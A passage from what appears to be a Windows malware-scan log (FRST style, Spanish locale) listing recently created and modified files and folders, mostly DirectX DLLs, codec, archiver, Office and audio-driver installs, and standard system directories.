2020-08-16 18:48 - 2009-03-16 14:18 - 000521560 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_4.dll
2020-08-16 18:48 - 2009-03-16 14:18 - 000517448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_4.dll
2020-08-16 18:48 - 2009-03-16 14:18 - 000235352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_4.dll
2020-08-16 18:48 - 2009-03-16 14:18 - 000174936 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_4.dll
2020-08-16 18:48 - 2009-03-16 14:18 - 000024920 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_6.dll
2020-08-16 18:48 - 2009-03-16 14:18 - 000022360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_6.dll
2020-08-16 18:48 - 2009-03-09 15:27 - 005425496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_41.dll
2020-08-16 18:48 - 2009-03-09 15:27 - 004178264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_41.dll
2020-08-16 18:48 - 2009-03-09 15:27 - 002430312 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_41.dll
2020-08-16 18:48 - 2009-03-09 15:27 - 001846632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_41.dll
2020-08-16 18:48 - 2009-03-09 15:27 - 000520544 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_41.dll
2020-08-16 18:48 - 2009-03-09 15:27 - 000453456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_41.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000518480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_3.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000514384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_3.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000235856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_3.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000175440 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_3.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000074576 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_2.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000070992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_2.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000025936 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_5.dll
2020-08-16 18:48 - 2008-10-27 10:04 - 000023376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_5.dll
2020-08-16 18:48 - 2008-10-10 04:52 - 005631312 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_40.dll
2020-08-16 18:48 - 2008-10-10 04:52 - 004379984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_40.dll
2020-08-16 18:48 - 2008-10-10 04:52 - 002605920 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_40.dll
2020-08-16 18:48 - 2008-10-10 04:52 - 002036576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_40.dll
2020-08-16 18:48 - 2008-10-10 04:52 - 000519000 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_40.dll
2020-08-16 18:48 - 2008-10-10 04:52 - 000452440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_40.dll
2020-08-16 18:48 - 2008-07-31 10:41 - 000238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_2.dll
2020-08-16 18:48 - 2008-07-31 10:41 - 000177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_2.dll
2020-08-16 18:48 - 2008-07-31 10:41 - 000072200 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_1.dll
2020-08-16 18:48 - 2008-07-31 10:41 - 000068616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_1.dll
2020-08-16 18:48 - 2008-07-31 10:40 - 000513544 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_2.dll
2020-08-16 18:48 - 2008-07-31 10:40 - 000509448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_2.dll
2020-08-16 18:48 - 2008-07-10 11:01 - 000467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_39.dll
2020-08-16 18:48 - 2008-07-10 11:00 - 004992520 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_39.dll
2020-08-16 18:48 - 2008-07-10 11:00 - 003851784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_39.dll
2020-08-16 18:48 - 2008-07-10 11:00 - 001942552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_39.dll
2020-08-16 18:48 - 2008-07-10 11:00 - 001493528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_39.dll
2020-08-16 18:48 - 2008-07-10 11:00 - 000540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_39.dll
2020-08-16 18:48 - 2008-05-30 14:19 - 000511496 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_1.dll
2020-08-16 18:48 - 2008-05-30 14:19 - 000507400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_1.dll
2020-08-16 18:48 - 2008-05-30 14:18 - 000238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_1.dll
2020-08-16 18:48 - 2008-05-30 14:18 - 000177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_1.dll
2020-08-16 18:48 - 2008-05-30 14:17 - 000068104 _____ (Microsoft Corporation) C:\Windows\system32\XAPOFX1_0.dll
2020-08-16 18:48 - 2008-05-30 14:17 - 000065032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAPOFX1_0.dll
2020-08-16 18:48 - 2008-05-30 14:17 - 000025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_4.dll
2020-08-16 18:48 - 2008-05-30 14:16 - 000028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_4.dll
2020-08-16 18:48 - 2008-05-30 14:11 - 004991496 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_38.dll
2020-08-16 18:48 - 2008-05-30 14:11 - 003850760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_38.dll
2020-08-16 18:48 - 2008-05-30 14:11 - 001941528 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_38.dll
2020-08-16 18:48 - 2008-05-30 14:11 - 001491992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_38.dll
2020-08-16 18:48 - 2008-05-30 14:11 - 000540688 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_38.dll
2020-08-16 18:48 - 2008-05-30 14:11 - 000467984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_38.dll
2020-08-16 18:48 - 2008-03-05 16:04 - 000489480 _____ (Microsoft Corporation) C:\Windows\system32\XAudio2_0.dll
2020-08-16 18:48 - 2008-03-05 16:03 - 000479752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XAudio2_0.dll
2020-08-16 18:48 - 2008-03-05 16:03 - 000238088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine3_0.dll
2020-08-16 18:48 - 2008-03-05 16:03 - 000177672 _____ (Microsoft Corporation) C:\Windows\system32\xactengine3_0.dll
2020-08-16 18:48 - 2008-03-05 16:00 - 000028168 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_3.dll
2020-08-16 18:48 - 2008-03-05 16:00 - 000025608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_3.dll
2020-08-16 18:48 - 2008-03-05 15:56 - 004910088 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_37.dll
2020-08-16 18:48 - 2008-03-05 15:56 - 003786760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_37.dll
2020-08-16 18:48 - 2008-03-05 15:56 - 001860120 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_37.dll
2020-08-16 18:48 - 2008-03-05 15:56 - 001420824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_37.dll
2020-08-16 18:48 - 2008-02-05 23:07 - 000529424 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_37.dll
2020-08-16 18:48 - 2008-02-05 23:07 - 000462864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_37.dll
2020-08-16 18:48 - 2007-10-22 03:40 - 000411656 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_10.dll
2020-08-16 18:48 - 2007-10-22 03:39 - 000267272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_10.dll
2020-08-16 18:48 - 2007-10-22 03:37 - 000021000 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2020-08-16 18:48 - 2007-10-22 03:37 - 000017928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_2.dll
2020-08-16 18:48 - 2007-10-12 15:14 - 005081608 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2020-08-16 18:48 - 2007-10-12 15:14 - 003734536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_36.dll
2020-08-16 18:48 - 2007-10-12 15:14 - 002006552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2020-08-16 18:48 - 2007-10-12 15:14 - 001374232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_36.dll
2020-08-16 18:48 - 2007-10-02 09:56 - 000508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2020-08-16 18:48 - 2007-10-02 09:56 - 000444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_36.dll
2020-08-16 18:48 - 2007-07-20 00:57 - 000411496 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2020-08-16 18:48 - 2007-07-20 00:57 - 000267112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_9.dll
2020-08-16 18:48 - 2007-07-19 18:14 - 005073256 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2020-08-16 18:48 - 2007-07-19 18:14 - 003727720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_35.dll
2020-08-16 18:48 - 2007-07-19 18:14 - 001985904 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2020-08-16 18:48 - 2007-07-19 18:14 - 001358192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_35.dll
2020-08-16 18:48 - 2007-07-19 18:14 - 000508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2020-08-16 18:48 - 2007-07-19 18:14 - 000444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_35.dll
2020-08-16 18:48 - 2007-06-20 20:49 - 000409960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2020-08-16 18:48 - 2007-06-20 20:46 - 000266088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_8.dll
2020-08-16 18:48 - 2007-05-16 16:45 - 004496232 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2020-08-16 18:48 - 2007-05-16 16:45 - 003497832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_34.dll
2020-08-16 18:48 - 2007-05-16 16:45 - 001401200 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2020-08-16 18:48 - 2007-05-16 16:45 - 001124720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_34.dll
2020-08-16 18:48 - 2007-05-16 16:45 - 000506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2020-08-16 18:48 - 2007-05-16 16:45 - 000443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_34.dll
2020-08-16 18:48 - 2007-04-04 18:55 - 000403304 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2020-08-16 18:48 - 2007-04-04 18:55 - 000261480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_7.dll
2020-08-16 18:48 - 2007-04-04 18:54 - 000107368 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2020-08-16 18:48 - 2007-04-04 18:53 - 000081768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_3.dll
2020-08-16 18:48 - 2007-03-15 16:57 - 000506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2020-08-16 18:48 - 2007-03-15 16:57 - 000443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_33.dll
2020-08-16 18:48 - 2007-03-12 16:42 - 004494184 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2020-08-16 18:48 - 2007-03-12 16:42 - 003495784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_33.dll
2020-08-16 18:48 - 2007-03-12 16:42 - 001400176 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2020-08-16 18:48 - 2007-03-12 16:42 - 001123696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_33.dll
2020-08-16 18:48 - 2007-03-05 12:42 - 000017688 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2020-08-16 18:48 - 2007-03-05 12:42 - 000015128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_1.dll
2020-08-16 18:48 - 2007-01-24 15:27 - 000393576 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2020-08-16 18:48 - 2007-01-24 15:27 - 000255848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_6.dll
2020-08-16 18:48 - 2006-12-08 12:02 - 000251672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_5.dll
2020-08-16 18:48 - 2006-12-08 12:00 - 000390424 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2020-08-16 18:48 - 2006-11-29 13:06 - 004398360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2020-08-16 18:48 - 2006-11-29 13:06 - 003426072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_32.dll
2020-08-16 18:48 - 2006-11-29 13:06 - 000469264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2020-08-16 18:48 - 2006-11-29 13:06 - 000440080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10.dll
2020-08-16 18:48 - 2006-09-28 16:05 - 003977496 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2020-08-16 18:48 - 2006-09-28 16:05 - 002414360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_31.dll
2020-08-16 18:48 - 2006-09-28 16:05 - 000237848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_4.dll
2020-08-16 18:48 - 2006-09-28 16:04 - 000364824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2020-08-16 18:48 - 2006-07-28 09:31 - 000083736 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2020-08-16 18:48 - 2006-07-28 09:30 - 000363288 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2020-08-16 18:48 - 2006-07-28 09:30 - 000236824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_3.dll
2020-08-16 18:48 - 2006-07-28 09:30 - 000062744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_2.dll
2020-08-16 18:48 - 2006-05-31 07:24 - 000230168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_2.dll
2020-08-16 18:48 - 2006-05-31 07:22 - 000354072 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2020-08-16 18:48 - 2006-03-31 12:41 - 003927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2020-08-16 18:48 - 2006-03-31 12:40 - 002388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2020-08-16 18:48 - 2006-03-31 12:40 - 000352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2020-08-16 18:48 - 2006-03-31 12:39 - 000229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2020-08-16 18:48 - 2006-03-31 12:39 - 000083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2020-08-16 18:48 - 2006-03-31 12:39 - 000062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2020-08-16 18:48 - 2006-02-03 08:43 - 003830992 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2020-08-16 18:48 - 2006-02-03 08:43 - 002332368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_29.dll
2020-08-16 18:48 - 2006-02-03 08:42 - 000355536 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2020-08-16 18:48 - 2006-02-03 08:42 - 000230096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_0.dll
2020-08-16 18:48 - 2006-02-03 08:41 - 000016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2020-08-16 18:48 - 2006-02-03 08:41 - 000014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2020-08-16 18:48 - 2005-12-05 18:09 - 003815120 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2020-08-16 18:48 - 2005-12-05 18:09 - 002323664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_28.dll
2020-08-16 18:48 - 2005-07-22 19:59 - 003807440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2020-08-16 18:48 - 2005-07-22 19:59 - 002319568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_27.dll
2020-08-16 18:48 - 2005-05-26 15:34 - 003767504 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2020-08-16 18:48 - 2005-05-26 15:34 - 002297552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_26.dll
2020-08-16 18:48 - 2005-03-18 17:19 - 003823312 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2020-08-16 18:48 - 2005-03-18 17:19 - 002337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2020-08-16 18:48 - 2005-02-05 19:45 - 003544272 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2020-08-16 18:48 - 2005-02-05 19:45 - 002222800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_24.dll
2020-08-16 18:47 - 2020-08-16 18:48 - 000000000 ___HD C:\Windows\msdownld.tmp
2020-08-16 18:47 - 2020-08-16 18:48 - 000000000 ____D C:\Windows\SysWOW64\directx
2020-08-16 18:47 - 2020-08-16 18:47 - 000003196 _____ C:\Windows\system32\Tasks\klcp_update
2020-08-16 18:47 - 2020-08-16 18:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack
2020-08-16 18:47 - 2020-08-16 18:47 - 000000000 ____D C:\Program Files (x86)\K-Lite Codec Pack
2020-08-16 18:46 - 2020-08-22 10:46 - 000000000 ____D C:\Program Files\Microsoft Office
2020-08-16 18:46 - 2020-08-16 18:46 - 000000000 ____D C:\Program Files\Microsoft Office 15
2020-08-16 18:45 - 2020-08-24 13:25 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-08-16 18:45 - 2020-08-24 13:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2020-08-16 18:45 - 2020-08-16 18:45 - 000000000 ____D C:\Program Files\WinRAR
2020-08-16 18:44 - 2020-08-16 18:44 - 000000000 ____D C:\Users\Hetitor\AppData\Local\PeerDistRepub
2020-08-16 18:44 - 2020-08-16 18:44 - 000000000 ____D C:\Users\Hetitor\AppData\Local\mpress
2020-08-16 18:43 - 2020-08-16 18:43 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2020-08-16 18:41 - 2020-08-16 18:41 - 000744808 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-08-16 18:40 - 2020-08-20 13:52 - 000000000 ___RD C:\Users\Hetitor\OneDrive
2020-08-16 18:39 - 2020-08-27 23:27 - 000000000 ____D C:\Users\Hetitor\AppData\Local\D3DSCache
2020-08-16 18:39 - 2020-08-18 15:10 - 000000000 ____D C:\Users\Hetitor\AppData\Local\AMD
2020-08-16 18:39 - 2020-08-16 18:39 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2020-08-16 18:39 - 2020-06-23 00:56 - 001145480 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtCOM64.dll
2020-08-16 18:39 - 2020-06-23 00:56 - 001098480 _____ (Realtek Semiconductor) C:\Windows\system32\RtkAudUService64.exe
2020-08-16 18:39 - 2020-06-23 00:56 - 000844888 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkApi64U.dll
2020-08-16 18:39 - 2020-06-23 00:56 - 000468784 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtDataProc64.dll
2020-08-16 18:39 - 2020-06-23 00:56 - 000224288 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkCfg64.dll
2020-08-16 18:39 - 2020-06-23 00:55 - 006672488 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\Drivers\RTKVHD64.sys
2020-08-16 18:39 - 2020-06-23 00:44 - 040219475 _____ C:\Windows\system32\Drivers\RTAIODAT.DAT
2020-08-16 18:38 - 2020-09-02 09:16 - 001678444 _____ C:\Windows\system32\PerfStringBackup.INI
2020-08-16 18:38 - 2020-09-02 09:06 - 000000000 ____D C:\Windows\system32\AMD
2020-08-16 18:38 - 2020-09-01 15:07 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Adobe
2020-08-16 18:38 - 2020-09-01 15:07 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Packages
2020-08-16 18:38 - 2020-08-28 16:45 - 000000000 ____D C:\Users\Hetitor\AppData\Local\VirtualStore
2020-08-16 18:38 - 2020-08-18 16:28 - 000000000 ____D C:\Users\Hetitor\AppData\Local\ConnectedDevicesPlatform
2020-08-16 18:38 - 2020-08-18 08:26 - 000000000 __RHD C:\Users\Public\AccountPictures
2020-08-16 18:38 - 2020-08-18 08:26 - 000000000 ___RD C:\Users\Hetitor\3D Objects
2020-08-16 18:38 - 2020-08-16 18:38 - 000000000 ___HD C:\Users\Hetitor\MicrosoftEdgeBackups
2020-08-16 18:38 - 2020-08-16 18:38 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Publishers
2020-08-16 18:38 - 2020-08-16 18:38 - 000000000 ____D C:\Users\Hetitor\AppData\Local\MicrosoftEdge
2020-08-16 18:37 - 2020-08-28 16:45 - 000000000 ____D C:\Users\Hetitor
2020-08-16 18:37 - 2020-08-17 19:59 - 000002373 _____ C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-08-16 18:37 - 2020-08-16 18:37 - 000000020 ___SH C:\Users\Hetitor\ntuser.ini
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Reciente
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Plantillas
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Mis documentos
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Menú Inicio
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Impresoras
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Entorno de red
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Documents\Mis vídeos
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Documents\Mis imágenes
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Documents\Mi música
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Datos de programa
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\Configuración local
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\AppData\Roaming\Microsoft\Windows\Start Menu\Programas
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\AppData\Local\Historial
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\AppData\Local\Datos de programa
2020-08-16 18:37 - 2020-08-16 18:37 - 000000000 _SHDL C:\Users\Hetitor\AppData\Local\Archivos temporales de Internet
==================== Un mes (modificado) ==================
(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)
2020-09-02 09:16 - 2019-03-19 08:49 - 000747206 _____ C:\Windows\system32\perfh00A.dat
2020-09-02 09:16 - 2019-03-19 08:49 - 000144966 _____ C:\Windows\system32\perfc00A.dat
2020-09-02 09:16 - 2019-03-19 01:50 - 000000000 ____D C:\Windows\INF
2020-09-02 09:12 - 2019-03-19 01:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-09-02 09:10 - 2019-03-19 01:37 - 000786432 _____ C:\Windows\system32\config\BBI
2020-09-01 11:29 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\NDF
2020-08-30 19:10 - 2019-03-19 01:37 - 000000000 ____D C:\Windows\CbsTemp
2020-08-29 14:05 - 2019-03-19 01:37 - 000032768 _____ C:\Windows\system32\config\ELAM
2020-08-24 21:05 - 2019-03-19 01:52 - 000000000 ___HD C:\Windows\ELAMBKUP
2020-08-23 10:01 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\AppReadiness
2020-08-22 17:08 - 2019-03-19 01:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-08-19 18:02 - 2019-03-19 01:52 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2020-08-18 00:37 - 2019-03-19 08:52 - 000000000 ___SD C:\Windows\system32\AppV
2020-08-18 00:37 - 2019-03-19 08:52 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2020-08-18 00:37 - 2019-03-19 08:52 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-08-18 00:37 - 2019-03-19 08:52 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2020-08-18 00:37 - 2019-03-19 08:49 - 000000000 ____D C:\Windows\system32\Drivers\es-MX
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ___SD C:\Windows\SysWOW64\F12
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ___SD C:\Windows\system32\UNP
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ___SD C:\Windows\system32\F12
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ___SD C:\Windows\system32\DiagSvcs
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ___RD C:\Windows\PrintDialog
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\TextInput
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\SysWOW64\setup
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\SysWOW64\oobe
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\SysWOW64\es-MX
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\SysWOW64\Dism
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\SysWOW64\Com
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\SysWOW64\AdvancedInstallers
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\SystemResources
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\WinMetadata
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\WinBioPlugIns
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\SystemResetPlatform
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\setup
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\PerceptionSimulation
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\oobe
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\migwiz
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\es-MX
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\Dism
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\Com
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\appraiser
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\AdvancedInstallers
